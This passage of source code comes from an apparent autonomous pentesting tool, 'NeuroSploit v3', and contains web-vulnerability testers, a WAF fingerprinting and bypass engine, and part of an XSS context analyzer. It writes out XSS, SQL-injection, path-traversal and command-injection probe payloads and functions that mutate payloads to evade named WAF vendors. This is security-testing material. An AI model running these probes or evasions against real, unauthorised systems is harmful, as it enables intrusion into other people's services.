"""Check for auth bypass with type coercion"""
body_lower = response_body.lower()
# Type juggling payloads
juggling_values = ["0", "true", "false", "null", "[]", "{}", "0e123", "0e999"]
if payload.strip() in juggling_values or payload.strip().startswith("0e"):
# Auth bypass
if response_status == 200:
auth_success = [
"authenticated", "logged in", "welcome", "dashboard",
"token", "session", "success",
]
for indicator in auth_success:
if indicator in body_lower:
return True, 0.8, f"Type juggling: auth bypass with '{payload.strip()}' - '{indicator}' in response"
# JWT/token accepted
if "jwt" in body_lower or "bearer" in body_lower:
if response_status == 200:
return True, 0.7, f"Type juggling: token accepted with value '{payload.strip()}'"
# Magic hash comparison bypass (0e strings)
if re.match(r"0e\d+", payload.strip()):
if response_status == 200 and any(w in body_lower for w in ["match", "equal", "valid", "correct"]):
return True, 0.85, f"Type juggling: magic hash bypass with '{payload.strip()}'"
# Array vs string comparison
if payload.strip() in ["[]", "Array"]:
if response_status == 200 and "success" in body_lower:
return True, 0.7, "Type juggling: array comparison bypass"
return False, 0.0, None
class TimingAttackTester(BaseTester):
"""Tester for Timing Attack vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "timing_attack"
def check_timeout_vulnerability(self, vuln_type: str) -> bool:
"""Timing attacks are detected via response time differences"""
return True
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check response time differences for timing side channels"""
# Primary detection is via response timing (handled by engine)
response_time = context.get("response_time_ms", 0)
baseline_time = context.get("baseline_time_ms", 0)
if response_time > 0 and baseline_time > 0:
diff = response_time - baseline_time
# Significant timing difference (> 100ms)
if diff > 100:
return True, 0.7, f"Timing attack: {diff}ms difference (baseline: {baseline_time}ms, actual: {response_time}ms)"
# Very significant (> 500ms)
if diff > 500:
return True, 0.9, f"Timing attack: {diff}ms difference strongly indicates character-by-character comparison"
# Check for timing via multiple measurements
if "timing_samples" in context:
samples = context["timing_samples"]
if len(samples) >= 2:
max_diff = max(samples) - min(samples)
if max_diff > 200:
return True, 0.65, f"Timing attack: {max_diff}ms variance across samples"
return False, 0.0, None
class HostHeaderInjectionTester(BaseTester):
"""Tester for Host Header Injection vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "host_header_injection"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for Host value reflected in response links/URLs"""
body_lower = response_body.lower()
# Injected host appearing in response
evil_hosts = ["evil.com", "attacker.com", "neurosploit.test", "canary.host"]
for host in evil_hosts:
if host in payload.lower() and host in body_lower:
# High confidence if in URL context
url_contexts = [
rf'https?://{re.escape(host)}',
rf'href\s*=\s*["\'][^"\']*{re.escape(host)}',
rf'action\s*=\s*["\'][^"\']*{re.escape(host)}',
rf'redirect.*{re.escape(host)}',
]
for pattern in url_contexts:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.9, f"Host header injection: '{host}' reflected in URL context"
return True, 0.7, f"Host header injection: '{host}' reflected in response body"
# X-Forwarded-Host injection
if "x-forwarded-host" in payload.lower():
headers_lower = {k.lower(): v for k, v in response_headers.items()}
location = headers_lower.get("location", "")
if any(h in location.lower() for h in evil_hosts):
return True, 0.9, "Host header injection: X-Forwarded-Host reflected in redirect"
# Password reset link poisoning
if context.get("is_password_reset") and response_status == 200:
for host in evil_hosts:
if host in body_lower:
return True, 0.95, f"Host header injection in password reset: link points to '{host}'"
return False, 0.0, None
class HttpSmugglingTester(BaseTester):
"""Tester for HTTP Request Smuggling vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "http_smuggling"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for HTTP smuggling indicators"""
headers_lower = {k.lower(): v for k, v in response_headers.items()}
# Response splitting - two HTTP responses in one
if re.search(r"HTTP/\d\.\d\s+\d{3}", response_body):
return True, 0.85, "HTTP smuggling: embedded HTTP response in body (response splitting)"
# Conflicting Content-Length and Transfer-Encoding
has_cl = "content-length" in headers_lower
has_te = "transfer-encoding" in headers_lower
if has_cl and has_te:
return True, 0.7, "HTTP smuggling: both Content-Length and Transfer-Encoding present"
# CL.TE or TE.CL desync indicators
if context.get("desync_detected"):
return True, 0.9, "HTTP smuggling: request desync confirmed"
# Unexpected response to smuggled second request
if "smuggle_marker" in context:
marker = context["smuggle_marker"]
if marker in response_body:
return True, 0.85, f"HTTP smuggling: smuggled request marker '{marker}' in response"
# Different status than expected (frontend vs backend disagreement)
if context.get("expected_status") and response_status != context["expected_status"]:
if response_status in [400, 403] and context["expected_status"] == 200:
return True, 0.5, f"HTTP smuggling: status mismatch (expected {context['expected_status']}, got {response_status})"
# Timeout on second request (queued/poisoned)
if context.get("second_request_timeout"):
return True, 0.7, "HTTP smuggling: second request timed out (possible queue poisoning)"
return False, 0.0, None
def check_timeout_vulnerability(self, vuln_type: str) -> bool:
"""Smuggling can cause timeouts on subsequent requests"""
return True
class CachePoisoningTester(BaseTester):
"""Tester for Web Cache Poisoning vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "cache_poisoning"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for cache poisoning - injected content served from cache"""
headers_lower = {k.lower(): v for k, v in response_headers.items()}
# Check for cache hit with injected content
cache_hit = False
cache_headers = ["x-cache", "cf-cache-status", "x-varnish", "x-drupal-cache",
"x-proxy-cache", "x-cdn-cache"]
for header in cache_headers:
value = headers_lower.get(header, "").lower()
if "hit" in value:
cache_hit = True
break
# Age header indicates cached response
age = headers_lower.get("age")
if age and age != "0":
cache_hit = True
if cache_hit:
# Check if our injected content is in the cached response
injection_markers = ["neurosploit", "xss", "evil.com", "attacker"]
for marker in injection_markers:
if marker in payload.lower() and marker in response_body.lower():
return True, 0.9, f"Cache poisoning: injected content '{marker}' served from cache"
# Unkeyed header reflected in response (potential cache poison vector)
unkeyed_headers = ["x-forwarded-host", "x-forwarded-scheme", "x-original-url",
"x-rewrite-url", "x-forwarded-prefix"]
for header in unkeyed_headers:
if header in payload.lower():
# Check if the value appears in response
for marker in ["evil.com", "neurosploit", "attacker"]:
if marker in payload.lower() and marker in response_body.lower():
cache_status = "cached" if cache_hit else "uncached"
confidence = 0.85 if cache_hit else 0.5
return True, confidence, f"Cache poisoning: unkeyed header '{header}' reflected ({cache_status})"
# Cache deception check
if context.get("is_cache_deception_test"):
if cache_hit and ("token" in response_body.lower() or "session" in response_body.lower()):
return True, 0.8, "Cache deception: sensitive data cached via path confusion"
return False, 0.0, None
@@ -97,3 +97,115 @@ class CSRFTester(BaseTester):
return True, 0.7, "No CSRF token found in form - possible CSRF"
return False, 0.0, None
class GraphqlIntrospectionTester(BaseTester):
"""Tester for GraphQL Introspection exposure"""
def __init__(self):
super().__init__()
self.name = "graphql_introspection"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for __schema data in response indicating introspection is enabled"""
if response_status == 200:
# Direct __schema indicators
schema_patterns = [
r'"__schema"\s*:\s*\{',
r'"__type"\s*:\s*\{',
r'"queryType"\s*:\s*\{',
r'"mutationType"\s*:\s*\{',
r'"subscriptionType"\s*:',
r'"types"\s*:\s*\[.*"name"\s*:\s*"__',
r'"directives"\s*:\s*\[.*"name"\s*:',
]
for pattern in schema_patterns:
if re.search(pattern, response_body, re.IGNORECASE | re.DOTALL):
return True, 0.9, "GraphQL introspection: Full schema exposed via __schema query"
# Check for type listings
type_listing_patterns = [
r'"kind"\s*:\s*"(?:OBJECT|SCALAR|ENUM|INPUT_OBJECT|INTERFACE|UNION)"',
r'"fields"\s*:\s*\[.*"name"\s*:.*"type"\s*:',
r'"inputFields"\s*:\s*\[',
r'"enumValues"\s*:\s*\[',
]
type_match_count = sum(
1 for p in type_listing_patterns
if re.search(p, response_body, re.IGNORECASE | re.DOTALL)
)
if type_match_count >= 2:
return True, 0.85, "GraphQL introspection: Type schema data exposed"
# Check for field suggestions (partial introspection)
if re.search(r'"(?:message|errors)".*"Did you mean.*"', response_body):
return True, 0.6, "GraphQL introspection: Field suggestions leak schema information"
return False, 0.0, None
class GraphqlDosTester(BaseTester):
"""Tester for GraphQL Denial of Service via deeply nested queries"""
def __init__(self):
super().__init__()
self.name = "graphql_dos"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for slow response with deeply nested queries indicating DoS potential"""
# Check response time for nested query DoS
response_time_ms = context.get("response_time_ms", 0)
# Nested query indicators in payload
nesting_indicators = [
payload.count("{") > 5,
"__typename" in payload and payload.count("__typename") > 3,
"fragment" in payload.lower() and "..." in payload,
]
is_nested_payload = any(nesting_indicators)
if is_nested_payload:
# Very slow response indicates resource exhaustion
if response_time_ms > 10000: # > 10 seconds
return True, 0.85, f"GraphQL DoS: Deeply nested query caused {response_time_ms}ms response time"
if response_time_ms > 5000: # > 5 seconds
return True, 0.7, f"GraphQL DoS: Nested query caused slow response ({response_time_ms}ms)"
# Check for timeout/error responses
if response_status in [408, 504, 502]:
if is_nested_payload:
return True, 0.8, "GraphQL DoS: Server timeout on deeply nested query"
# Check for resource limit errors (server has some protection but confirms issue)
resource_errors = [
r"query.*(?:too complex|too deep|exceeds.*(?:depth|complexity))",
r"max.*(?:depth|complexity).*(?:exceeded|reached)",
r"(?:depth|complexity)\s+limit",
r"query.*(?:cost|weight).*exceeded",
]
for pattern in resource_errors:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.5, "GraphQL DoS: Depth/complexity limits exist but confirm nested queries are processed"
# Server error on complex query
if response_status == 500 and is_nested_payload:
return True, 0.65, "GraphQL DoS: Server error on deeply nested query"
return False, 0.0, None
+533
View File
@@ -0,0 +1,533 @@
"""
NeuroSploit v3 - WAF Detector
WAF fingerprinting, bypass strategy database, and payload adaptation
for autonomous pentesting. Detects 15+ WAF vendors and provides
per-WAF bypass techniques.
"""
import logging
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any
logger = logging.getLogger(__name__)
@dataclass
class WAFMatch:
"""A detected WAF."""
name: str # "cloudflare", "aws_waf", etc.
confidence: float # 0.0-1.0
detection_method: str # "header", "body", "server", "probe"
evidence: str
@dataclass
class WAFResult:
"""Complete WAF detection result."""
detected_wafs: List[WAFMatch] = field(default_factory=list)
blocking_patterns: Dict[str, bool] = field(default_factory=dict)
recommended_delay: float = 0.1
# 15+ WAF signatures
WAF_SIGNATURES = {
"cloudflare": {
"headers": ["cf-ray", "cf-request-id", "cf-cache-status"],
"body": ["cloudflare", "ray id:", "error 1020", "error 1015"],
"server": ["cloudflare"],
},
"aws_waf": {
"headers": ["x-amzn-requestid", "x-amzn-errortype"],
"body": ["request blocked", "aws waf"],
"server": ["cloudfront", "amazons3"],
},
"akamai": {
"headers": ["x-akamai-session-info", "akamai-origin-hop"],
"body": ["akamai", "ghost"],
"server": ["akamaighost"],
},
"imperva": {
"headers": ["x-iinfo", "x-cdn"],
"body": ["imperva", "incapsula incident", "incapsula"],
"server": ["imperva"],
},
"modsecurity": {
"headers": ["x-denied-reason", "x-modsecurity"],
"body": ["mod_security", "modsecurity", "noyb"],
"server": [],
},
"f5_bigip": {
"headers": ["x-waf-status", "x-cnection"],
"body": ["the requested url was rejected"],
"server": ["big-ip", "bigip", "f5"],
},
"sucuri": {
"headers": ["x-sucuri-id", "x-sucuri-cache"],
"body": ["sucuri", "sucuri website firewall", "cloudproxy"],
"server": ["sucuri"],
},
"barracuda": {
"headers": ["barra_counter_session"],
"body": ["barracuda", "barracuda networks"],
"server": [],
},
"fortinet": {
"headers": ["x-fw-server"],
"body": ["fortigate", "fortiweb", "fortinet"],
"server": ["fortiweb"],
},
"citrix": {
"headers": ["citrix-transactionid", "cneonction", "nncoection"],
"body": ["citrix", "netscaler appfw"],
"server": ["netscaler"],
},
"azure_waf": {
"headers": ["x-azure-ref", "x-ms-forbidden-ip"],
"body": ["azure application gateway", "azure front door"],
"server": ["microsoft-azure-application-gateway"],
},
"gcp_armor": {
"headers": ["x-cloud-trace-context"],
"body": ["google cloud armor", "forbidden by security policy"],
"server": ["google frontend", "gfe"],
},
"wordfence": {
"headers": [],
"body": ["wordfence", "generated by wordfence", "this response was generated by wordfence"],
"server": [],
},
"cloudfront": {
"headers": ["x-amz-cf-id", "x-amz-cf-pop"],
"body": ["cloudfront", "error from cloudfront"],
"server": ["cloudfront"],
},
"fastly": {
"headers": ["x-fastly-request-id", "fastly-restarts"],
"body": ["fastly error"],
"server": ["fastly"],
},
"reblaze": {
"headers": ["rbzid"],
"body": ["reblaze", "access denied (rbz)"],
"server": ["reblaze"],
},
}
# Bypass strategies per WAF
BYPASS_STRATEGIES = {
"cloudflare": {
"xss": [
"unicode_escape", # \u003cscript\u003e
"svg_payload", # <svg onload=...>
"comment_injection", # <scr<!---->ipt>
"case_mixing", # <ScRiPt>
"html_entity", # &#x3c;script&#x3e;
],
"sqli": [
"inline_comment", # /*!50000UNION*/
"case_mixing", # uNiOn SeLeCt
"whitespace_variant", # UNION%0bSELECT
"scientific_notation", # 1e0UNION
],
"general": {
"delay": 0.3,
"headers": {"X-Forwarded-For": "127.0.0.1"},
},
},
"modsecurity": {
"xss": [
"inline_comment",
"case_mixing",
"whitespace_variant",
"null_byte",
],
"sqli": [
"inline_comment", # /*!50000OR*/
"case_mixing",
"double_encoding", # %2527
"whitespace_variant", # tab, newline, %0a
],
"general": {
"delay": 0.2,
},
},
"aws_waf": {
"xss": [
"double_encoding",
"null_byte",
"unicode_escape",
"svg_payload",
],
"sqli": [
"double_encoding", # %253C = <
"null_byte", # \x00
"scientific_notation", # 1e0=1
"concat_function", # CONCAT(0x27,...)
],
"general": {
"delay": 0.2,
},
},
"imperva": {
"xss": [
"unicode_escape",
"html_entity",
"svg_payload",
"comment_injection",
],
"sqli": [
"inline_comment",
"hex_encoding",
"whitespace_variant",
],
"general": {
"delay": 0.5,
},
},
"generic": {
"xss": [
"case_mixing",
"unicode_escape",
"svg_payload",
"html_entity",
],
"sqli": [
"inline_comment",
"case_mixing",
"whitespace_variant",
],
"general": {
"delay": 0.3,
"headers": {"X-Forwarded-For": "127.0.0.1"},
},
},
}
class WAFDetector:
"""WAF fingerprinting and bypass strategy engine.
Usage:
detector = WAFDetector(request_engine)
result = await detector.detect(url)
if result.detected_wafs:
adapted = detector.adapt_payload(payload, waf_name, vuln_type)
"""
# Probe payloads that trigger WAF responses
PROBE_PAYLOADS = {
"xss": "<script>alert(1)</script>",
"sqli": "' OR 1=1--",
"lfi": "../../etc/passwd",
"rce": ";cat /etc/passwd",
}
def __init__(self, request_engine=None):
self.request_engine = request_engine
self._cache: Dict[str, WAFResult] = {} # url -> result
async def detect(self, url: str) -> WAFResult:
"""Detect WAFs on the target URL.
Phase 1: Passive detection (headers/body from normal response)
Phase 2: Active probing (send trigger payloads, analyze blocks)
"""
from urllib.parse import urlparse
host = urlparse(url).netloc
if host in self._cache:
return self._cache[host]
detected: List[WAFMatch] = []
blocking: Dict[str, bool] = {}
# Phase 1: Passive detection from baseline request
if self.request_engine:
try:
result = await self.request_engine.request(url, method="GET")
if result:
passive_wafs = self._check_signatures(
result.headers, result.body, result.status
)
detected.extend(passive_wafs)
except Exception as e:
logger.debug(f"WAF passive detection error: {e}")
# Phase 2: Active probing (only if request engine available)
if self.request_engine:
for probe_type, payload in self.PROBE_PAYLOADS.items():
try:
probe_url = f"{url}?test={payload}"
result = await self.request_engine.request(
probe_url, method="GET"
)
if result:
if result.status in (403, 406, 429, 501):
blocking[probe_type] = True
probe_wafs = self._check_signatures(
result.headers, result.body, result.status
)
for w in probe_wafs:
if not any(d.name == w.name for d in detected):
w.detection_method = "probe"
detected.append(w)
else:
blocking[probe_type] = False
except Exception:
pass
# Determine recommended delay
delay = 0.1
if detected:
primary_waf = detected[0].name
strategy = BYPASS_STRATEGIES.get(primary_waf, BYPASS_STRATEGIES["generic"])
delay = strategy.get("general", {}).get("delay", 0.3)
waf_result = WAFResult(
detected_wafs=detected,
blocking_patterns=blocking,
recommended_delay=delay,
)
self._cache[host] = waf_result
if detected:
waf_names = ", ".join(f"{w.name}({w.confidence:.0%})" for w in detected)
logger.info(f"WAF detected on {host}: {waf_names}")
return waf_result
def _check_signatures(
self,
headers: Dict[str, str],
body: str,
status: int,
) -> List[WAFMatch]:
"""Check response against WAF signature database."""
matches = []
headers_lower = {k.lower(): v.lower() for k, v in headers.items()}
body_lower = (body or "").lower()[:5000]
server = headers_lower.get("server", "")
for waf_name, sigs in WAF_SIGNATURES.items():
evidence_parts = []
confidence = 0.0
# Check headers
for h in sigs.get("headers", []):
if h.lower() in headers_lower:
evidence_parts.append(f"header:{h}")
confidence += 0.4
# Check body
for b in sigs.get("body", []):
if b.lower() in body_lower:
evidence_parts.append(f"body:{b}")
confidence += 0.3
# Check server header
for s in sigs.get("server", []):
if s.lower() in server:
evidence_parts.append(f"server:{s}")
confidence += 0.5
if evidence_parts:
confidence = min(1.0, confidence)
matches.append(WAFMatch(
name=waf_name,
confidence=confidence,
detection_method="header" if any("header:" in e for e in evidence_parts) else "body",
evidence=", ".join(evidence_parts),
))
# Sort by confidence
matches.sort(key=lambda m: m.confidence, reverse=True)
return matches
def get_bypass_strategy(self, waf_name: str, vuln_type: str) -> Dict:
"""Get bypass strategy for a specific WAF + vuln type combination."""
strategies = BYPASS_STRATEGIES.get(waf_name, BYPASS_STRATEGIES["generic"])
# Normalize vuln type to category
category = self._vuln_to_category(vuln_type)
techniques = strategies.get(category, strategies.get("xss", []))
general = strategies.get("general", {})
return {
"techniques": techniques,
"delay": general.get("delay", 0.3),
"extra_headers": general.get("headers", {}),
}
def adapt_payload(
self, payload: str, waf_name: str, vuln_type: str
) -> List[str]:
"""Generate bypass variants of a payload for a specific WAF.
Returns list of adapted payloads, with original as fallback.
"""
strategy = self.get_bypass_strategy(waf_name, vuln_type)
adapted = []
for technique in strategy.get("techniques", []):
variant = self._apply_technique(payload, technique, vuln_type)
if variant and variant != payload:
adapted.append(variant)
# Deduplicate while preserving order
seen = set()
unique = []
for p in adapted:
if p not in seen:
seen.add(p)
unique.append(p)
return unique[:8] # Max 8 variants
def _vuln_to_category(self, vuln_type: str) -> str:
"""Map specific vuln type to WAF bypass category."""
sqli_types = {"sqli_error", "sqli_blind", "sqli_union", "sqli_time",
"sqli", "nosql_injection"}
xss_types = {"xss_reflected", "xss_stored", "xss_dom", "xss"}
if vuln_type in sqli_types:
return "sqli"
if vuln_type in xss_types:
return "xss"
return "xss" # Default category
def _apply_technique(self, payload: str, technique: str, vuln_type: str) -> Optional[str]:
"""Apply a specific bypass technique to a payload."""
try:
if technique == "unicode_escape":
return self._unicode_escape(payload)
elif technique == "case_mixing":
return self._case_mix(payload)
elif technique == "double_encoding":
return self._double_encode(payload)
elif technique == "null_byte":
return self._null_byte(payload)
elif technique == "comment_injection":
return self._comment_inject(payload)
elif technique == "inline_comment":
return self._inline_comment(payload)
elif technique == "whitespace_variant":
return self._whitespace_variant(payload)
elif technique == "svg_payload":
return self._svg_variant(payload)
elif technique == "html_entity":
return self._html_entity(payload)
elif technique == "scientific_notation":
return self._scientific_notation(payload)
elif technique == "hex_encoding":
return self._hex_encode(payload)
elif technique == "concat_function":
return self._concat_function(payload)
except Exception:
pass
return None
# --- Bypass technique implementations ---
def _unicode_escape(self, payload: str) -> str:
"""Replace key characters with unicode escapes."""
replacements = {
"<": "\\u003c", ">": "\\u003e", "'": "\\u0027",
'"': "\\u0022", "/": "\\u002f",
}
result = payload
for old, new in replacements.items():
result = result.replace(old, new)
return result
def _case_mix(self, payload: str) -> str:
"""Alternate case: <ScRiPt>, uNiOn SeLeCt."""
result = []
upper = True
for c in payload:
if c.isalpha():
result.append(c.upper() if upper else c.lower())
upper = not upper
else:
result.append(c)
return "".join(result)
def _double_encode(self, payload: str) -> str:
"""Double URL-encode special characters."""
import urllib.parse
# First encode
encoded = urllib.parse.quote(payload, safe="")
# Encode the % signs
return encoded.replace("%", "%25")
def _null_byte(self, payload: str) -> str:
"""Insert null bytes before key characters."""
return payload.replace("<", "%00<").replace("'", "%00'").replace('"', '%00"')
def _comment_inject(self, payload: str) -> str:
"""Inject HTML comments into tags."""
# <script> -> <scr<!---->ipt>
payload = payload.replace("<script>", "<scr<!---->ipt>")
payload = payload.replace("</script>", "</scr<!---->ipt>")
return payload
def _inline_comment(self, payload: str) -> str:
"""SQL inline comment bypass: UNION -> /*!50000UNION*/"""
keywords = ["UNION", "SELECT", "OR", "AND", "FROM", "WHERE"]
result = payload
for kw in keywords:
result = re.sub(
rf'\b{kw}\b',
f'/*!50000{kw}*/',
result,
flags=re.IGNORECASE
)
return result
def _whitespace_variant(self, payload: str) -> str:
"""Replace spaces with alternative whitespace."""
alternatives = ["%09", "%0a", "%0b", "%0c", "%0d", "%a0"]
result = payload
for alt in alternatives[:2]:
result = result.replace(" ", alt, 1)
return result
def _svg_variant(self, payload: str) -> str:
"""Convert XSS to SVG-based payload."""
# Extract the JS code if possible
match = re.search(r'(?:alert|confirm|prompt)\([^)]*\)', payload)
if match:
js_code = match.group(0)
return f'<svg onload="{js_code}">'
return '<svg/onload=alert(1)>'
def _html_entity(self, payload: str) -> str:
"""Encode with HTML entities."""
replacements = {
"<": "&#60;", ">": "&#62;", "'": "&#39;",
'"': "&#34;", "/": "&#47;",
}
result = payload
for old, new in replacements.items():
result = result.replace(old, new)
return result
def _scientific_notation(self, payload: str) -> str:
"""Use scientific notation for SQL: 1 OR -> 1e0OR"""
return re.sub(r'(\d+)\s+(OR|AND|UNION)', r'\1e0\2', payload, flags=re.IGNORECASE)
def _hex_encode(self, payload: str) -> str:
"""Hex-encode string literals in SQL."""
def to_hex(match):
s = match.group(1)
hex_str = "0x" + s.encode().hex()
return hex_str
return re.sub(r"'([^']+)'", to_hex, payload)
def _concat_function(self, payload: str) -> str:
"""Use CONCAT() to build strings."""
def concat_str(match):
s = match.group(1)
chars = ",".join(f"CHAR({ord(c)})" for c in s)
return f"CONCAT({chars})"
return re.sub(r"'([^']+)'", concat_str, payload)
+444
View File
@@ -0,0 +1,444 @@
"""
NeuroSploit v3 - XSS Context Analyzer
Determines whether a payload reflected in HTML is in an executable position
(auto-executing, interactive, or non-executable text content).
Used by XSS testers and response verifier for context-aware validation.
"""
import re
from typing import Dict, Optional
# Auto-executing events (fire without user interaction)
AUTO_FIRE_EVENTS = {
"onload", "onerror", "onabort", "onbegin", "onend", "onanimationend",
"onanimationstart", "ontransitionend", "onhashchange", "onpageshow",
"onpopstate", "onresize", "onscroll", "onstorage", "onunload",
"ontoggle", # when paired with <details open>
}
# Interactive events (require user action)
INTERACTIVE_EVENTS = {
"onclick", "ondblclick", "onmousedown", "onmouseup", "onmouseover",
"onmousemove", "onmouseout", "onmouseenter", "onmouseleave",
"onkeypress", "onkeydown", "onkeyup", "onfocus", "onblur",
"onchange", "onsubmit", "onreset", "onselect", "oninput",
"oncontextmenu", "oncopy", "oncut", "onpaste", "ondrag", "ondrop",
"onpointerdown", "onpointerup", "onpointerover", "onpointermove",
"ontouchstart", "ontouchend", "ontouchmove", "onfocusin", "onfocusout",
"onauxclick", "onsearch",
}
ALL_EVENTS = AUTO_FIRE_EVENTS | INTERACTIVE_EVENTS
# Tags that auto-fire events
AUTO_FIRE_TAGS = {
"script": True, # auto-executes content
"img": {"onerror"},
"video": {"onerror"},
"audio": {"onerror"},
"source": {"onerror"},
"object": {"onerror"},
"embed": {"onerror"},
"body": {"onload"},
"svg": {"onload"},
"math": set(),
"input": {"onfocus"}, # with autofocus
"select": {"onfocus"},
"textarea": {"onfocus"},
"details": {"ontoggle"}, # with open attribute
}
# Safe containers that suppress execution
SAFE_CONTAINERS = {"textarea", "title", "noscript", "xmp", "plaintext", "listing"}
# Pattern to find the innermost enclosing tag
_RE_BEFORE_TAG = re.compile(r'<(\w+)(?:\s[^>]*)?>(?=[^<]*$)', re.IGNORECASE)
_RE_OPEN_SCRIPT = re.compile(r'<script\b[^>]*>', re.IGNORECASE)
_RE_CLOSE_SCRIPT = re.compile(r'</script\b', re.IGNORECASE)
_RE_COMMENT_OPEN = re.compile(r'<!--(?!.*-->)', re.DOTALL)
_RE_STYLE_OPEN = re.compile(r'<style\b[^>]*>', re.IGNORECASE)
_RE_STYLE_CLOSE = re.compile(r'</style\b', re.IGNORECASE)
_RE_EVENT_ATTR = re.compile(r'(on\w+)\s*=\s*["\']?', re.IGNORECASE)
_RE_JS_URI = re.compile(r'(?:href|src|action|formaction)\s*=\s*["\']?\s*javascript:', re.IGNORECASE)
def analyze_xss_execution_context(
html_body: str,
payload: str,
payload_lower: Optional[str] = None,
) -> Dict:
"""
Determine whether a payload reflected in HTML is in an executable position.
Returns:
{
"executable": bool, # True if payload can auto-execute (no user action)
"interactive": bool, # True if payload executes WITH user interaction
"context": str, # Context identifier
"confidence": float, # 0.0 - 1.0
"detail": str, # Human-readable explanation
}
"""
result = {
"executable": False,
"interactive": False,
"context": "not_found",
"confidence": 0.0,
"detail": "Payload not found in response",
}
if not html_body or not payload:
return result
if payload_lower is None:
payload_lower = payload.lower()
body_lower = html_body.lower()
# Find payload position (try exact first, then case-insensitive)
pos = html_body.find(payload)
if pos == -1:
pos = body_lower.find(payload_lower)
if pos == -1:
return result
# Extract surrounding context
before_start = max(0, pos - 300)
after_end = min(len(html_body), pos + len(payload) + 150)
before = html_body[before_start:pos]
after = html_body[pos + len(payload):after_end]
before_lower = before.lower()
after_lower = after.lower()
# Check for HTML encoding of the payload
encoded_payload = payload.replace("<", "&lt;").replace(">", "&gt;")
if encoded_payload != payload and encoded_payload in html_body:
# The payload appears HTML-encoded
result.update({
"context": "encoded",
"confidence": 0.1,
"detail": f"Payload appears HTML-encoded (&lt;/&gt;)",
})
return result
# --- Check 1: Inside HTML comment ---
if "<!--" in before and "-->" not in before[before.rfind("<!--"):]:
result.update({
"context": "html_comment",
"confidence": 0.1,
"detail": "Payload inside HTML comment",
})
return result
# --- Check 2: Inside <script> tag ---
script_opens = list(_RE_OPEN_SCRIPT.finditer(before))
script_closes = list(_RE_CLOSE_SCRIPT.finditer(before))
if script_opens:
last_open = script_opens[-1].end()
last_close = script_closes[-1].start() if script_closes else -1
if last_open > last_close:
# We're inside a <script> block
# Check if payload breaks out of a JS string
if _payload_breaks_js_string(before[last_open:], payload):
result.update({
"executable": True,
"context": "script_breakout",
"confidence": 0.95,
"detail": "Payload breaks out of JS string inside <script> tag",
})
return result
# Check if payload introduces new code (not just a data value)
if any(kw in payload_lower for kw in ["alert(", "confirm(", "prompt(", "eval(", "function(", "document.", "window."]):
result.update({
"executable": True,
"context": "script_body",
"confidence": 0.90,
"detail": "Payload with JS execution inside <script> tag",
})
return result
result.update({
"executable": True,
"context": "script_body",
"confidence": 0.85,
"detail": "Payload inside <script> tag",
})
return result
# --- Check 3: Inside <style> tag (safe) ---
style_opens = list(_RE_STYLE_OPEN.finditer(before_lower))
style_closes = list(_RE_STYLE_CLOSE.finditer(before_lower))
if style_opens:
last_open = style_opens[-1].end()
last_close = style_closes[-1].start() if style_closes else -1
if last_open > last_close:
result.update({
"context": "safe_container",
"confidence": 0.1,
"detail": "Payload inside <style> tag",
})
return result
# --- Check 4: Inside a safe container ---
for container in SAFE_CONTAINERS:
open_pat = f"<{container}"
close_pat = f"</{container}"
if open_pat in before_lower:
last_open = before_lower.rfind(open_pat)
last_close = before_lower.rfind(close_pat)
if last_open > last_close:
result.update({
"context": "safe_container",
"confidence": 0.1,
"detail": f"Payload inside <{container}> (safe container)",
})
return result
# --- Check 5: Payload itself introduces a new HTML tag ---
if "<" in payload:
return _analyze_injected_tag(payload, payload_lower, result)
# --- Check 6: Determine if we're inside an HTML tag (attributes) or text content ---
# Find the last `<` in `before` and check if there's a `>` after it
last_lt = before.rfind("<")
in_tag = False
tag_name = ""
tag_region_before = ""
if last_lt >= 0:
# Text between last < and payload position
tag_region_before = before[last_lt:]
# If no > after the last <, we're inside an open tag (attribute region)
if ">" not in tag_region_before:
in_tag = True
# Extract tag name
tm = re.match(r'<(\w+)', tag_region_before)
if tm:
tag_name = tm.group(1).lower()
if in_tag and tag_name:
# We're inside a tag's attribute region
# Build the full attribute region: from <tag... to the closing >
first_gt = after.find(">")
after_to_close = after[:first_gt] if first_gt >= 0 else after
full_attr = tag_region_before + payload + after_to_close
full_attr_lower = full_attr.lower()
# Check if payload is the VALUE of an event handler attribute
# Look for on*= patterns in the text BEFORE the payload (within the tag)
before_in_tag = tag_region_before.lower()
for m in _RE_EVENT_ATTR.finditer(before_in_tag):
event_name = m.group(1).lower()
# This event is BEFORE the payload — payload is (part of) its value
if event_name in AUTO_FIRE_EVENTS:
result.update({
"executable": True,
"interactive": False,
"context": "event_handler_auto",
"confidence": 0.95,
"detail": f"Payload is value of auto-firing event '{event_name}' on <{tag_name}>",
})
return result
elif event_name in INTERACTIVE_EVENTS:
result.update({
"executable": False,
"interactive": True,
"context": "event_handler",
"confidence": 0.90,
"detail": f"Payload is value of interactive event '{event_name}' on <{tag_name}> (requires user action)",
})
return result
# Check if we're inside a javascript: URI attribute
if _RE_JS_URI.search(before_in_tag):
result.update({
"executable": False,
"interactive": True,
"context": "javascript_uri",
"confidence": 0.90,
"detail": f"Payload inside javascript: URI on <{tag_name}>",
})
return result
# Check if payload creates an event handler via attribute breakout
if _payload_creates_event(payload_lower):
# Check if autofocus is also present (makes onfocus auto-fire)
combined = (payload_lower + after_to_close.lower())
has_autofocus = "autofocus" in combined
for evt in ALL_EVENTS:
